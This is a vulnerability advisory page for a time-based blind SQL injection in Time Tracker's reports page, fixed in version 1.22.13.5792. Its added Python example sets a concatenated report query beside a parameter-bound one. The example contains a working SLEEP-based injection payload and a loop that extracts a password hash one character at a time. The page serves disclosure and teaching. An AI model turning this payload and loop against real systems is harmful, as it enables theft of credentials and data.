Time Tracker has Blind SQL Injection Vulnerability in Reports
Description
Time Tracker is an open source time tracking system. A time-based blind injection vulnerability existed in Time Tracker reports in versions prior to 1.22.13.5792. This was happening because the reports.php page was not validating all parameters in POST requests. Because some parameters were not checked, it was possible to craft POST requests with malicious SQL for the Time Tracker database. This issue is fixed in version 1.22.13.5792. As a workaround, use the fixed code in ttReportHelper.class.php from version 1.22.13.5792.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A time-based blind SQL injection in Time Tracker reports prior to 1.22.13.5792 allows attackers to extract sensitive data via crafted POST parameters.
Vulnerability
A time-based blind SQL injection vulnerability existed in Time Tracker reports in all versions prior to 1.22.13.5792. The reports.php page did not validate every parameter of its POST request before the values reached the report query built in ttReportHelper.class.php, so an unchecked parameter could carry attacker-controlled SQL into the Time Tracker database [1].
Exploitation
An attacker sends a crafted POST request to the reports.php endpoint with one of the unchecked parameters carrying SQL. Because the injected query returns nothing the attacker can see directly, the payload wraps a conditional delay (for example a SLEEP() call that fires only when an injected condition is true) and the answer is read from the server's response time; repeating this one yes/no question at a time extracts data character by character [1]. The advisory does not say what access is needed to reach reports.php. Since reports are a feature of Time Tracker's logged-in interface, the realistic precondition is an account that can open the reports page rather than anonymous access.
Impact
Successful exploitation allows an attacker to read data from the Time Tracker database that the reports page would never display, such as user credentials or other users' time records. The advisory frames the issue as information disclosure; it makes no claim that the injection point can modify data or execute code, and whether that is possible depends on the query form and database driver rather than on anything stated in the advisory. Even as a read-only primitive, disclosure of credentials is a practical first step toward further compromise of the system [1].
Mitigation
Time Tracker version 1.22.13.5792 and later contain a fix for this vulnerability. If upgrading is not immediately possible, the workaround is to apply the fixed ttReportHelper.class.php from the patched version to the running installation [1]. At the time of writing there is no evidence that this CVE is listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
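The timing oracle described under Exploitation and the parameter-binding fix described under Mitigation, as one added worked example. This is not Time Tracker's code and does not reproduce the real reports.php or ttReportHelper.class.php: the schema, the `login` parameter, the stored hash value and the SQLite stand-in (with a user-defined SLEEP() imitating MySQL's SLEEP()) are all constructed for illustration. It shows a report query that concatenates an unvalidated request value next to the same query with the value bound, and an extraction loop that recovers data through response time from the first and gets nothing from the second.

```python
import sqlite3
import time

DELAY = 0.3                     # seconds the injected condition sleeps when true
CHARSET = "0123456789abcdef"    # hex alphabet of the (constructed) stored hash


def make_db():
    """Constructed stand-in for the Time Tracker database (not its real schema).
    A user-defined SLEEP() imitates MySQL's SLEEP() so the oracle works in SQLite."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.executescript("""
        CREATE TABLE users (login TEXT, password_hash TEXT);
        CREATE TABLE time_entries (login TEXT, minutes INTEGER);
        INSERT INTO users VALUES ('admin', '5e884898da28047151d0e56f8dc62927');
        INSERT INTO time_entries VALUES ('admin', 90), ('bob', 30);
    """)
    return conn


def report_vulnerable(conn, login):
    """Hypothetical report query that concatenates an unvalidated POST value.
    This is the bug class the advisory describes, not the project's actual query."""
    sql = f"SELECT SUM(minutes) FROM time_entries WHERE login = '{login}'"
    return conn.execute(sql).fetchone()[0]


def report_fixed(conn, login):
    """Same query with the value bound as a parameter: it can only ever be a login."""
    sql = "SELECT SUM(minutes) FROM time_entries WHERE login = ?"
    return conn.execute(sql, (login,)).fetchone()[0]


def oracle(conn, report_fn, condition):
    """Ask the database one yes/no question and read the answer from response time."""
    payload = f"x' OR (SELECT CASE WHEN ({condition}) THEN SLEEP({DELAY}) ELSE 0 END) --"
    start = time.perf_counter()
    try:
        report_fn(conn, payload)
    except sqlite3.Error:
        return False            # blind: an SQL error just looks like "no delay"
    return time.perf_counter() - start >= DELAY / 2


def extract_hash_prefix(conn, report_fn, length):
    """Recover the first `length` characters of the admin hash, one guess per query."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            cond = (f"SUBSTR((SELECT password_hash FROM users WHERE login = 'admin'), "
                    f"{pos}, 1) = '{ch}'")
            if oracle(conn, report_fn, cond):
                recovered += ch
                break
        else:
            break               # no guess delayed the response: there is no oracle
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable build:", extract_hash_prefix(db, report_vulnerable, 3))
    print("fixed build     :", repr(extract_hash_prefix(db, report_fixed, 3)))
```

Against `report_vulnerable` the loop recovers the hash prefix from nothing but timing, which is what makes the bug exploitable without any error message or data in the response. Against `report_fixed` the same payload is compared as a literal login string, so no guess ever delays the response and the loop stops empty; binding every request value (or rejecting anything outside an allow-list for values that cannot be bound, such as column names or sort orders) is the property the 1.22.13.5792 fix restores for the report parameters.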
Affected products
1- Range: < 1.22.13.5792
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
1- https://github.com/anuko/timetracker/security/advisories/GHSA-758x-vg7g-j9j3 (x_refsource_CONFIRM)
News mentions
No linked articles in our index yet.